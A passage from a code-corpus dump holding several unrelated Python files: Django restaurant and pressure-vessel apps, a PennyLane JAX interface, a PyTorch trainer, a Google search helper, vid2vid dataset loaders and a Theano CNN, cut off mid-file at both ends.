= True\n print(rests)\n if 'search' in request.GET:\n search = request.GET['search'].split()\n print(search)\n for val in search:\n if flag:\n newrests = Cold_Dishes.objects.filter(name__icontains=val)\n print(newrests)\n if newrests:\n rests = newrests\n else:\n continue\n flag = False\n else:\n newrests = Cold_Dishes.objects.filter(name__icontains=val)\n if newrests:\n rests = newrests\n\n return HttpResponse(json.dumps([i.dict() for i in rests]), content_type=\"application/javascript\")\n\ndef DelCold_Dishes(request,id):\n result = \"Successful del\"\n if request.method == \"POST\":\n Cold_Dishes.objects.get(id=int(id)).delete()\n return render(request,\"main.html\", {'result': result, 'user' : request.user})\n\n\ndef Orders(request):\n result = \"Ваш заказ прийнятий, найближчим часом з вами звяжеться наш менеджер\"\n if request.method == \"POST\" and request.POST['name'] and request.POST['surname'] and request.POST['phone'] and request.POST['email'] and request.POST['number'] and request.POST['date']:\n Order.objects.create(name=request.POST['name'],\n surname=request.POST['surname'],\n phone=request.POST['phone'],\n email=request.POST['email'],\n number=request.POST['number'],\n date=request.POST['date'])\n return render(request, \"main.html\", {'result': result, 'user': request.user})\n else:\n if request.method == \"GET\":\n return render(request, \"order.html\", {'orders': Order.objects.all(), 'user': request.user})\n\n\ndef Orders_get(request):\n args = {}\n if request.method == 'GET':\n return render(request, \"listOfOrders.html\", {'orders': Order.objects.all(), 'user': request.user})\n\ndef Contact(request):\n if request.method == 'GET':\n return render(request,\"Contacts.html\",{'user':request.user})","sub_path":"courses/mysite/restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"158289122","text":"import json\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.db.models import get_model, CharField, IntegerField, DateField\nfrom django import forms\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom models import all_models, JSON_FIELDS_MAP\n\nVALIDATION_FORM_MAP = {IntegerField: forms.IntegerField, CharField: forms.CharField, DateField: forms.DateField, }\n\n\ndef create_adding_form(m):\n fields = {}\n for field in m._meta.fields:\n if field.__class__ == DateField: fields[field.name] = forms.TextInput(attrs={'class': 'datepicker'})\n if field.__class__ == IntegerField: fields[field.name] = forms.TextInput(attrs={'pattern': '\\d+'})\n\n class AddingForm(forms.ModelForm):\n model = forms.CharField(widget=forms.HiddenInput, initial=m.__name__)\n class Meta:\n model = m\n widgets = fields\n return AddingForm\n\n\ndef home(request):\n if request.method == 'POST' and 'model' in request.POST:\n model = get_model(__name__.split('.')[0], request.POST['model'])\n if model in all_models():\n form = create_adding_form(model)(request.POST)\n if form.is_valid():\n form.save()\n return render(request, 'index.html', {'models': [{'name': m.__name__, 'verbose_name': m._meta.verbose_name,\n 'form': create_adding_form(m)} for m in all_models()]})\n\n\ndef open_model(request):\n if request.is_ajax() and request.method == 'GET':\n model = get_model(__name__.split('.')[0], request.GET['name'])\n fields = model._meta.fields\n\n header = [field.verbose_name for field in fields]\n items = []\n for item in model.objects.all():\n items.append([{'name': field.name,\n 'type': JSON_FIELDS_MAP[field.__class__],\n 'value': getattr(item, field.name)} for field in fields])\n return HttpResponse(json.dumps({'header': header, 'items': items}, cls=DjangoJSONEncoder),\n mimetype=\"application/json\")\n\n\nclass ValidationForm(forms.Form):\n def __init__(self, model_field_class, *args, **kwargs):\n super(ValidationForm, self).__init__(*args, **kwargs)\n self.fields['field'] = VALIDATION_FORM_MAP[model_field_class]()\n\n\ndef edit_field(request):\n result = False\n if request.is_ajax() and request.method == 'POST':\n model = get_model(__name__.split('.')[0], request.POST['model'])\n object_id = int(request.POST['object_id'])\n field_name = request.POST['name']\n value = request.POST['value']\n form = ValidationForm(model._meta.get_field(field_name).__class__, {'field': value})\n if form.is_valid():\n result = model.objects.filter(pk=object_id).update(**{field_name: value})\n return HttpResponse(json.dumps(result), mimetype=\"application/json\")\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"37413458","text":"# Copyright 2018-2021 Xanadu Quantum Technologies Inc.\r\n\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\"\"\"\r\nThis module contains the mixin interface class for creating differentiable quantum tapes with\r\nJAX.\r\n\"\"\"\r\nfrom functools import partial\r\nimport jax\r\nimport jax.experimental.host_callback as host_callback\r\nimport jax.numpy as jnp\r\nfrom pennylane.queuing import AnnotatedQueue\r\nfrom pennylane.operation import Variance, Expectation\r\n\r\n\r\nclass JAXInterface(AnnotatedQueue):\r\n \"\"\"Mixin class for applying an JAX interface to a :class:`~.JacobianTape`.\r\n\r\n JAX-compatible quantum tape classes can be created via subclassing:\r\n\r\n .. code-block:: python\r\n\r\n class MyJAXQuantumTape(JAXInterface, JacobianTape):\r\n\r\n Alternatively, the JAX interface can be dynamically applied to existing\r\n quantum tapes via the :meth:`~.apply` class method. This modifies the\r\n tape **in place**.\r\n\r\n Once created, the JAX interface can be used to perform quantum-classical\r\n differentiable programming.\r\n\r\n .. note::\r\n\r\n If using a device that supports native JAX computation and backpropagation, such as\r\n :class:`~.DefaultQubitJAX`, the JAX interface **does not need to be applied**. It\r\n is only applied to tapes executed on non-JAX compatible devices.\r\n\r\n **Example**\r\n\r\n Once a JAX quantum tape has been created, it can be differentiated using JAX:\r\n\r\n .. code-block:: python\r\n\r\n tape = JAXInterface.apply(JacobianTape())\r\n\r\n with tape:\r\n qml.Rot(0, 0, 0, wires=0)\r\n expval(qml.PauliX(0))\r\n\r\n def cost_fn(x, y, z, device):\r\n tape.set_parameters([x, y ** 2, y * np.sin(z)], trainable_only=False)\r\n return tape.execute(device=device)\r\n\r\n >>> x = jnp.array(0.1, requires_grad=False)\r\n >>> y = jnp.array(0.2, requires_grad=True)\r\n >>> z = jnp.array(0.3, requires_grad=True)\r\n >>> dev = qml.device(\"default.qubit\", wires=2)\r\n >>> cost_fn(x, y, z, device=dev)\r\n DeviceArray([ 0.03991951], dtype=float32)\r\n >>> jac_fn = jax.vjp(cost_fn)\r\n >>> jac_fn(x, y, z, device=dev)\r\n DeviceArray([[ 0.39828408, -0.00045133]], dtype=float32)\r\n \"\"\"\r\n\r\n # pylint: disable=attribute-defined-outside-init\r\n dtype = jnp.float64\r\n\r\n @property\r\n def interface(self): # pylint: disable=missing-function-docstring\r\n return \"jax\"\r\n\r\n def _execute(self, params, device):\r\n # TODO (chase): Add support for more than 1 measured observable.\r\n if len(self.observables) != 1:\r\n raise ValueError(\r\n \"The JAX interface currently only supports quantum nodes with a single return type.\"\r\n )\r\n return_type = self.observables[0].return_type\r\n if return_type is not Variance and return_type is not Expectation:\r\n raise ValueError(\r\n f\"Only Variance and Expectation returns are supported for the JAX interface, given {return_type}.\"\r\n )\r\n\r\n @jax.custom_vjp\r\n def wrapped_exec(params):\r\n exec_fn = partial(self.execute_device, device=device)\r\n return host_callback.call(\r\n exec_fn,\r\n params,\r\n result_shape=jax.ShapeDtypeStruct((1,), JAXInterface.dtype),\r\n )\r\n\r\n def wrapped_exec_fwd(params):\r\n return wrapped_exec(params), params\r\n\r\n def wrapped_exec_bwd(params, g):\r\n def jacobian(params):\r\n tape = self.copy()\r\n tape.set_parameters(params)\r\n return tape.jacobian(device, params=params, **tape.jacobian_options)\r\n\r\n val = g.reshape((-1,)) * host_callback.call(\r\n jacobian,\r\n params,\r\n result_shape=jax.ShapeDtypeStruct((1, len(params)), JAXInterface.dtype),\r\n )\r\n return (list(val.reshape((-1,))),) # Comma is on purpose.\r\n\r\n wrapped_exec.defvjp(wrapped_exec_fwd, wrapped_exec_bwd)\r\n return wrapped_exec(params)\r\n\r\n @classmethod\r\n def apply(cls, tape):\r\n \"\"\"Apply the JAX interface to an existing tape in-place.\r\n\r\n Args:\r\n tape (.JacobianTape): a quantum tape to apply the JAX interface to\r\n\r\n **Example**\r\n\r\n >>> with JacobianTape() as tape:\r\n ... qml.RX(0.5, wires=0)\r\n ... expval(qml.PauliZ(0))\r\n >>> JAXInterface.apply(tape)\r\n >>> tape\r\n , params=1>\r\n \"\"\"\r\n tape_class = getattr(tape, \"__bare__\", tape.__class__)\r\n tape.__bare__ = tape_class\r\n tape.__class__ = type(\"JAXQuantumTape\", (cls, tape_class), {})\r\n return tape\r\n","sub_path":"pennylane/interfaces/jax.py","file_name":"jax.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"231371062","text":"import logging\nimport os\nimport pdb\n\nfrom tqdm import tqdm \nimport numpy as np\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torch_geometric.data import Data\n\nfrom utils.helper import RunningAverage, save_checkpoint, load_checkpoint, get_logger, get_batch_size\nfrom utils.visualize import VisdomLinePlotter\n\nclass Trainer:\n \"\"\"Network trainer\n\n Args:\n model: network model to be trained\n optimizer (nn.optim.Optimizer): optimizer used for training\n lr_scheduler (torch.optim.lr_scheduler._LRScheduler): learning rate scheduler\n WARN: bear in mind that lr_scheduler.step() is invoked after every validation step\n (i.e. validate_after_iters) not after every epoch. So e.g. if one uses StepLR with step_size=30\n the learning rate will be adjusted after every 30 * validate_after_iters iterations.\n loss_criterion (callable): loss function\n eval_criterion (callable): used to compute training/validation metricc\n saving the best checkpoint is based on the result of this function on the validation set\n device (torch.device): device to train on\n loaders (dict): 'train' and 'val' loaders\n checkpoint_dir (string): dir for saving checkpoints and tensorboard logs\n max_num_epochs (int): maximum number of epochs\n max_num_iterations (int): maximum number of iterations\n validate_after_iters (int): validate after that many iterations\n log_after_iters (int): number of iterations before logging to tensorboard\n validate_iters (int): number of validation iterations, if None validate\n on the whole validation set\n eval_score_higher_is_better (bool): if True higher eval scores are considered better\n best_eval_score (float): best validation score so far (higher better)\n num_iterations (int): useful when loading the model from the checkpoint\n num_epoch (int): useful when loading the model from the checkpoint\n \"\"\"\n\n def __init__(self, model, optimizer, lr_scheduler, loss_criterion,\n eval_criterion, device, loaders, checkpoint_dir,\n max_num_epochs=1000, max_num_iterations=None,\n validate_after_iters=None, log_after_iters=None,\n validate_iters=None, num_iterations=0, num_epoch=0,\n eval_score_higher_is_better=True, best_eval_score=None,\n logger=None, inference_config = None):\n if logger is None:\n self.logger = get_logger('Trainer', level=logging.DEBUG)\n else:\n self.logger = logger\n self.plotter = VisdomLinePlotter('gcn')\n\n self.logger.info(model)\n self.model = model\n self.optimizer = optimizer\n self.scheduler = lr_scheduler\n self.loss_criterion = loss_criterion\n self.eval_criterion = eval_criterion\n self.device = device\n self.loaders = loaders\n self.checkpoint_dir = checkpoint_dir\n self.max_num_epochs = max_num_epochs\n self.max_num_iterations = max_num_iterations\n self.validate_after_iters = validate_after_iters\n self.log_after_iters = log_after_iters\n self.validate_iters = validate_iters\n self.eval_score_higher_is_better = eval_score_higher_is_better\n self.inference_config = inference_config\n logger.info(f'eval_score_higher_is_better: {eval_score_higher_is_better}')\n\n if best_eval_score is not None:\n self.best_eval_score = best_eval_score\n else:\n # initialize the best_eval_score\n if eval_score_higher_is_better:\n self.best_eval_score = float('-inf')\n else:\n self.best_eval_score = float('+inf')\n\n self.writer = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'logs'))\n\n self.num_iterations = num_iterations\n self.num_epoch = num_epoch\n\n @classmethod\n def from_checkpoint(cls, checkpoint_path, model, optimizer, lr_scheduler, loss_criterion, eval_criterion,\n device, loaders, logger=None, inference_config = None):\n logger.info(f\"Loading checkpoint '{checkpoint_path}'...\")\n state = load_checkpoint(checkpoint_path, model, optimizer)\n logger.info(\n f\"Checkpoint loaded. Epoch: {state['epoch']}. Best val score: {state['best_eval_score']}. Num_iterations: {state['num_iterations']}\")\n checkpoint_dir = os.path.split(checkpoint_path)[0]\n return cls(model, optimizer, lr_scheduler,\n loss_criterion, eval_criterion,\n device, loaders, checkpoint_dir,\n eval_score_higher_is_better=state['eval_score_higher_is_better'],\n best_eval_score=state['best_eval_score'],\n num_iterations=state['num_iterations'],\n num_epoch=state['epoch'],\n max_num_epochs=state['max_num_epochs'],\n max_num_iterations=state['max_num_iterations'],\n validate_after_iters=state['validate_after_iters'],\n log_after_iters=state['log_after_iters'],\n validate_iters=state['validate_iters'],\n logger=logger, inference_config = inference_config)\n\n @classmethod\n def from_pretrained(cls, pre_trained, model, optimizer, lr_scheduler, loss_criterion, eval_criterion,\n device, loaders,\n max_num_epochs=1000, max_num_iterations=None,\n validate_after_iters=None, log_after_iters=None,\n validate_iters=None, num_iterations=0, num_epoch=0,\n eval_score_higher_is_better=True, best_eval_score=None,\n logger=None, inference_config = None):\n logger.info(f\"Logging pre-trained model from '{pre_trained}'...\")\n load_checkpoint(pre_trained, model, None)\n checkpoint_dir = os.path.split(pre_trained)[0]\n return cls(model, optimizer, lr_scheduler,\n loss_criterion, eval_criterion,\n device, loaders, checkpoint_dir,\n eval_score_higher_is_better=eval_score_higher_is_better,\n best_eval_score=best_eval_score,\n num_iterations=num_iterations,\n num_epoch=num_epoch,\n max_num_epochs=max_num_epochs,\n max_num_iterations=max_num_iterations,\n validate_after_iters=validate_after_iters,\n log_after_iters=log_after_iters,\n validate_iters=validate_iters,\n logger=logger, inference_config = inference_config)\n\n def fit(self):\n for _ in range(self.num_epoch, self.max_num_epochs):\n # train for one epoch\n should_terminate = self.train(self.loaders['train'])\n\n if should_terminate:\n break\n\n self.num_epoch += 1\n\n def train(self, train_loader):\n \"\"\"Trains the model for 1 epoch.\n\n Args:\n train_loader (torch.utils.data.DataLoader): training data loader\n\n Returns:\n True if the training should be terminated immediately, False otherwise\n \"\"\"\n train_losses = RunningAverage()\n train_eval_scores = RunningAverage()\n self.logger.info(\n f'Training epoch [{self.num_epoch}/{self.max_num_epochs - 1}], iteration per epoch: {len(train_loader)}. ')\n # sets the model in training mode\n self.model.train()\n if self.validate_after_iters is None:\n self.validate_after_iters = len(train_loader)\n if self.log_after_iters is None:\n self.log_after_iters = self.validate_after_iters\n if self.max_num_iterations is None:\n self.max_num_iterations = self.max_num_epochs * len(train_loader)\n\n for i, t in enumerate(train_loader):\n target = t.y.to(self.device)\n input = t.to(self.device)\n output, h = self.model(input)\n\n # compute loss criterion\n loss = self.loss_criterion(output, target)\n train_losses.update(loss.item(), get_batch_size(target))\n\n # compute eval criterion\n eval_score = self.eval_criterion(output, target)\n train_eval_scores.update(eval_score.item(), get_batch_size(target))\n\n # compute gradients and update parameters\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n if self.num_iterations % self.log_after_iters == 0:\n # log stats and params\n self.logger.info(\n f'Training iteration [{self.num_iterations}/{self.max_num_iterations - 1}]. Batch [{i}/{len(train_loader) - 1}]. Epoch [{self.num_epoch}/{self.max_num_epochs - 1}]')\n self.logger.info(\n f'Training stats. Loss: {train_losses.avg}. Evaluation score: {train_eval_scores.avg}')\n self._log_stats('train', train_losses.avg, train_eval_scores.avg)\n self.plotter.plot('loss', 'train', 'loss', self.num_iterations, train_losses.avg, xlabel='Iter')\n self.plotter.plot('accuracy', 'train', 'accuracy', self.num_iterations, train_eval_scores.avg, xlabel='Iter')\n\n train_losses = RunningAverage()\n train_eval_scores = RunningAverage()\n\n if self.num_iterations % self.validate_after_iters == 0:\n # evaluate on validation set\n eval_score = self.validate(self.loaders['val'])\n # adjust learning rate if necessary\n if isinstance(self.scheduler, ReduceLROnPlateau):\n self.scheduler.step(eval_score)\n else:\n self.scheduler.step()\n # log current learning rate in tensorboard\n self._log_lr()\n # remember best validation metric\n is_best = self._is_best_eval_score(eval_score)\n # save checkpoint\n self._save_checkpoint(is_best)\n self._log_params()\n\n if self.inference_config is not None:\n if (self.num_iterations >= self.inference_config['infer_init_iters'] and\n self.num_iterations % self.inference_config['infer_after_iters'] == 0):\n self.inference(self.loaders, h)\n\n if self.num_iterations >= self.max_num_iterations:\n self.logger.info(\n f'Maximum number of iterations {self.max_num_iterations} exceeded. Finishing training...')\n return True\n\n self.num_iterations += 1\n\n return False\n\n def validate(self, val_loader):\n\n val_losses = RunningAverage()\n val_scores = RunningAverage()\n \n self.logger.info(f'Validating epoch [{self.num_epoch}/{self.max_num_epochs - 1}]. ')\n if self.validate_iters is None:\n self.validate_iters = len(val_loader)\n val_iterator = iter(val_loader)\n \n try:\n self.model.eval()\n with torch.no_grad():\n for _ in tqdm(range(self.validate_iters)):\n try:\n t = next(val_iterator)\n except StopIteration:\n val_iterator = iter(val_loader)\n t = next(val_iterator)\n\n target = t.y.to(self.device)\n input = t.to(self.device)\n output, _ = self.model(input)\n\n # compute loss criterion\n loss = self.loss_criterion(output, target)\n val_losses.update(loss.item(), get_batch_size(target))\n\n # compute eval criterion\n eval_score = self.eval_criterion(output, target)\n val_scores.update(eval_score.item(), get_batch_size(target))\n\n self._log_stats('val', val_losses.avg, val_scores.avg)\n self.logger.info(f'Validation finished. Loss: {val_losses.avg}. Evaluation score: {val_scores.avg}')\n self.plotter.plot('loss', 'val', 'loss', self.num_iterations, val_losses.avg, xlabel='Iter')\n self.plotter.plot('accuracy', 'val', 'accuracy', self.num_iterations, val_scores.avg, xlabel='Iter')\n\n return val_scores.avg\n finally:\n # set back in training mode\n self.model.train()\n \n def inference(self, loaders, h):\n self.logger.info(f'Infering hidden data... ')\n return\n \n def _is_best_eval_score(self, eval_score):\n if self.eval_score_higher_is_better:\n is_best = eval_score > self.best_eval_score\n else:\n is_best = eval_score < self.best_eval_score\n\n if is_best:\n self.logger.info(f'Saving new best evaluation metric: {eval_score}')\n self.best_eval_score = eval_score\n return is_best\n\n def _save_checkpoint(self, is_best):\n if torch.cuda.device_count() > 1:\n model_state = self.model.module.state_dict()\n else:\n model_state = self.model.state_dict()\n save_checkpoint({\n 'epoch': self.num_epoch + 1,\n 'num_iterations': self.num_iterations,\n 'model_state_dict': model_state,\n 'best_eval_score': self.best_eval_score,\n 'eval_score_higher_is_better': self.eval_score_higher_is_better,\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'device': str(self.device),\n 'max_num_epochs': self.max_num_epochs,\n 'max_num_iterations': self.max_num_iterations,\n 'validate_after_iters': self.validate_after_iters,\n 'log_after_iters': self.log_after_iters,\n 'validate_iters': self.validate_iters\n }, is_best, checkpoint_dir=self.checkpoint_dir,\n logger=self.logger)\n\n def _log_lr(self):\n lr = self.optimizer.param_groups[0]['lr']\n self.writer.add_scalar('learning_rate', lr, self.num_iterations)\n\n def _log_stats(self, phase, loss_avg, eval_score_avg):\n tag_value = {\n f'{phase}_loss_avg': loss_avg,\n f'{phase}_eval_score_avg': eval_score_avg\n }\n\n for tag, value in tag_value.items():\n self.writer.add_scalar(tag, value, self.num_iterations)\n\n def _log_params(self):\n self.logger.info('Logging model parameters and gradients')\n for name, value in self.model.named_parameters():\n self.writer.add_histogram(name, value.data.cpu().numpy(), self.num_iterations)\n self.writer.add_histogram(name + '/grad', value.grad.data.cpu().numpy(), self.num_iterations)","sub_path":"utils/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":14865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"619988717","text":"from django.db import models\n\nclass Container(models.Model):\n name = models.CharField('Обозначение сосуда', max_length=50)\n _type = models.ForeignKey(\n 'ContainerType',\n verbose_name='Тип сосуда'\n )\n factory = models.ForeignKey(\n 'Factory',\n verbose_name='Завод-изготовитель'\n )\n #serial_number = models.CharField('Заводской номер', max_length=50, null=True, blank=True)\n #scheme = models.CharField('Номер чертежа', max_length=50, null=True, blank=True)\n #reg_number = models.CharField('Регистрационный номер', max_length=50, null=True, blank=True)\n #inv_number = models.CharField('Инвентарный номер', max_length=50, null=True, blank=True)\n #manufactured_year = models.PositiveSmallIntegerField('Год изготовления', null=True, blank=True)\n #started_year = models.PositiveSmallIntegerField('Год ввода в эксплуатацию', null=True, blank=True)\n #location = models.CharField('Место установки', max_length=200, null=True, blank=True)\n # Working conditions\n p_calc = models.FloatField('Давление расчетное, МПа')\n p_work = models.FloatField('Давление рабочее, МПа')\n p_test = models.FloatField('Давление пробное, МПа')\n temp_walls = models.SmallIntegerField('Расчетная температура стенок, ⁰С')\n temp_carrier_low = models.CharField('Рабочая температура среды (нижняя граница), ⁰С', max_length=50)\n temp_carrier_high = models.CharField('Рабочая температура среды (верхняя граница), ⁰С', max_length=50)\n carrier = models.ForeignKey(\n 'Carrier',\n verbose_name='Технологическая среда'\n )\n danger_class = models.PositiveSmallIntegerField('Класс опасности технологической среды по ГОСТ 12.1.007-76')\n explosiveness = models.CharField('Взрывоопасность', max_length=200)\n firehazard = models.CharField('Пожароопасность', max_length=200)\n volume = models.FloatField('Объем рабочий, м3')\n weight = models.PositiveSmallIntegerField('Масса сосуда (пустого), кг')\n insulatuion = models.CharField('Наличие и вид тепловой изоляции', max_length=100)\n lifetime = models.PositiveSmallIntegerField('Срок службы, лет')\n mode = models.CharField('Режим нагружения', max_length=50)\n dimensions_width_ring = models.PositiveSmallIntegerField('Внутренний диаметр обечайки, мм', blank = True, null = True)\n dimensions_width_bottom = models.PositiveSmallIntegerField('Внутренний диаметр днища, мм', blank = True, null = True)\n dimensions_width_top = models.PositiveSmallIntegerField('Диаметр плоской крышки, мм', blank = True, null = True)\n dimensions_height_ring = models.PositiveSmallIntegerField('Высота обечайки, мм', blank = True, null = True)\n dimensions_height_bottom = models.PositiveSmallIntegerField('Высота днища, мм', blank = True, null = True)\n dimensions_height_total = models.PositiveSmallIntegerField('Высота сосуда (общая)', blank = True, null = True)\n dimensions_side_ring = models.FloatField('Толщина стенок обечайки (проектная), мм', blank = True, null = True)\n dimensions_side_bottom = models.FloatField('Толщина стенок днища (проектная), мм', blank = True, null = True)\n dimensions_side_top = models.FloatField('Толщина стенок крышки (проектная), мм', blank = True, null = True)\n material_ring = models.ForeignKey(\n 'Material',\n verbose_name='Материал обечайки',\n related_name='material_ring'\n )\n material_bottom = models.ForeignKey(\n 'Material',\n verbose_name='Материал днища',\n related_name='material_bottom'\n )\n welding = models.ForeignKey(\n 'Welding',\n verbose_name='Сведения о сварке'\n )\n control = models.ForeignKey(\n 'Control',\n verbose_name='Контроль при изготовлении'\n )\n\n def __str__(self):\n return self.name\n #return '{} зав.№ {}, рег.№ {}, инв.№ {}'.format(\n # self.name.lower(),\n # self.serial_number,\n # self.reg_number,\n # self.inv_number,\n #)\n\n class Meta:\n verbose_name = 'Сосуд'\n verbose_name_plural = 'Сосуды'\n\nclass ContainerType(models.Model):\n _type = models.CharField('Тип сосуда', max_length=100)\n\n def __str__(self):\n return self._type\n\n class Meta:\n verbose_name = 'Тип сосуда'\n verbose_name_plural = 'Типы сосудов'\n\nclass Factory(models.Model):\n name = models.CharField('Наименование завода', unique=True, max_length=200)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Завод-изготовитель'\n verbose_name_plural = 'Заводы-изготовители'\n\nclass Carrier(models.Model):\n name = models.CharField('Тип носителя', unique=True, max_length=200)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Носитель'\n verbose_name_plural = 'Носители'\n\nclass Material(models.Model):\n name = models.CharField('Наименование материала', unique=True, max_length=200)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Материал'\n verbose_name_plural = 'Материалы'\n\nclass Welding(models.Model):\n name = models.CharField('Вид сварки', max_length=200)\n material = models.CharField('Материал сварки', max_length=200)\n\n def __str__(self):\n return '{} ({})'.format(self.name, self.material)\n\n class Meta:\n verbose_name = 'Сварка'\n verbose_name_plural = 'Сварка'\n\nclass Control(models.Model):\n name = models.CharField('Метод контроля при изготовлении', max_length=200)\n area = models.CharField('Объем контроля при изготовлении', max_length=200)\n\n def __str__(self):\n return '{} {}'.format(self.name, self.area)\n\n class Meta:\n verbose_name = 'Контроль'\n verbose_name_plural = 'Контроль'\n","sub_path":"gmp/apps/containers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"394561858","text":"import pprint\nfrom urllib.parse import urlparse\nimport json\nfrom googleapiclient.discovery import build #Библиотка CustomSearch API\n# Информация по установке https://developers.google.com/api-client-library/python/apis/customsearch/v1\n\ndef search(query, st = 1):\n #Достаем параметры из json\n with open('config.json', 'r') as f:\n config = json.load(f)\n #Данные о пользовательском поисковике\n #http://code.google.com/apis/console\n service = build('customsearch', 'v1', #Общие данные\n developerKey = config['developerKey'])#Ключ поисковика\n #Параметы поиска\n res = service.cse().list(\n q = query, #Запрос\n cx = config['cx'], #ID поисковика https://support.google.com/customsearch/answer/2649143?hl=en\n num = 10, #Количество результатов, максимаум 10\n lr = 'lang_ru', #Язык\n start = st, #Номер результата, после которого выводить следующие,\n cr = 'countryRU'\n ).execute()\n links = []\n # print(type (res['items']))\n # print(res['items'])\n #Составляем список ссылок-результатов\n for i in res['items']:\n parsed_uri = urlparse(i['link'])\n #Выделяем домен из URL\n domain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)\n links.append(domain)\n\n #pprint.pprint(res)\n return links\nif __name__ == '__main__':\n pprint.pprint(search(input()))","sub_path":"GSearch.py","file_name":"GSearch.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"129811209","text":"# -----------------------------------------------------------------------\r\n# Modified from imaginaire(https://github.com/NVlabs/imaginaire)\r\n# -----------------------------------------------------------------------\r\n# Copyright (C) 2020 NVIDIA Corporation. All rights reserved.\r\n#\r\n# This work is made available under the Nvidia Source Code License-NC.\r\n# To view a copy of this license, check out LICENSE.md\r\n# -----------------------------------------------------------------------\r\n\r\nfrom .pose_dataset import PoseDataset\r\nfrom .face_dataset import FaceDataset\r\n\r\n\r\ndef get_train_and_val_dataloader(cfg):\r\n \"\"\"\r\n Return dataset objects for the training and validation sets.\r\n\r\n Args:\r\n cfg (obj): Global configuration file.\r\n \r\n Returns:\r\n (dict):\r\n - train_data_loader (obj): Train data loader.\r\n - val_data_loader (obj): Val data loader.\r\n \"\"\"\r\n train_dataset, val_dataset = _get_train_and_val_dataset_objects(cfg)\r\n # train_reader = train_dataset.batch_reader(cfg.train_data.batch_size)\r\n # val_reader = val_dataset.batch_reader(cfg.val_data.batch_size)\r\n return train_dataset, val_dataset\r\n\r\n\r\ndef _get_train_and_val_dataset_objects(cfg):\r\n if cfg.data.name == 'pose':\r\n train_dataset = PoseDataset()\r\n val_dataset = PoseDataset()\r\n train_dataset.initialize(cfg.train_data)\r\n val_dataset.initialize(cfg.val_data)\r\n else:\r\n raise NotImplementedError()\r\n \r\n print(\"Train dataset length: \", len(train_dataset))\r\n print(\"Val dataset length: \", len(val_dataset))\r\n\r\n return train_dataset, val_dataset\r\n\r\n\r\ndef get_val_dataset(cfg):\r\n val_dataset = PoseDataset()\r\n val_dataset.initialize(cfg.val_data)\r\n print(\"Val dataset length: \", len(val_dataset))\r\n return val_dataset\r\n\r\n\r\ndef get_test_data_loader(cfg):\r\n \"\"\"\r\n Return dataset objects for the training and validation sets.\r\n\r\n Args:\r\n cfg (obj): Global configuration file.\r\n \r\n Returns:\r\n (dict):\r\n - train_data_loader (obj): Train data loader.\r\n - val_data_loader (obj): Val data loader.\r\n \"\"\"\r\n if cfg.data.name == 'pose':\r\n test_dataset = PoseDataset()\r\n test_dataset.initialize(cfg.inference_data)\r\n elif cfg.data.name == 'faceForensics':\r\n test_dataset = FaceDataset()\r\n test_dataset.initialize(cfg.inference_data)\r\n\r\n return test_dataset\r\n","sub_path":"vid2vid/datasets/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"193490292","text":"import numpy as np\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.signal import pool\nfrom theano.tensor.nnet import conv2d\n\nfrom LogisticRegression import LogisticRegression\nfrom utils import load_data\nfrom util_layers import LeNetConvPoolLayer, HiddenLayer, negative_log_likelihood\n\nclass CNN(object):\n\n def __init__(self, input, image_shape, numpy_rng, filter_sizes, batch_size, n_out=10):\n\n # instance variables\n self.numpy_rng = numpy_rng\n self.input = input\n self.image_shape = image_shape\n self.filter_sizes = filter_sizes\n self.n_out = n_out\n self.batch_size = batch_size\n self.params = []\n\n self.initialize_variables()\n\n ################\n ## Prediction ##\n ################\n self.y_pred = self.logistic_regression_layer.y_pred\n\n def initialize_variables(self):\n\n # Reshape matrix of rasterized images of shape (batch_size, 28 * 28)\n # to a 4D tensor, compatible with our LeNetConvPoolLayer\n # (28, 28) is the size of MNIST images.\n self.layer0_input = self.input.reshape(self.image_shape)\n\n # Construct the first convolutional pooling layer:\n # filtering reduces the image size to (28-5+1 , 28-5+1) = (24, 24)\n # maxpooling reduces this further to (24/2, 24/2) = (12, 12)\n # 4D output tensor is thus of shape (batch_size, filter_sizes[0], 12, 12)\n self.conv_layer = LeNetConvPoolLayer(\n rng = self.numpy_rng,\n input=self.layer0_input,\n image_shape=(-1, self.image_shape[1], self.image_shape[2], self.image_shape[3]),\n filter_shape=(self.filter_sizes[0], 1, 5, 5),\n poolsize=(2, 2)\n )\n self.params.extend(self.conv_layer.params)\n\n 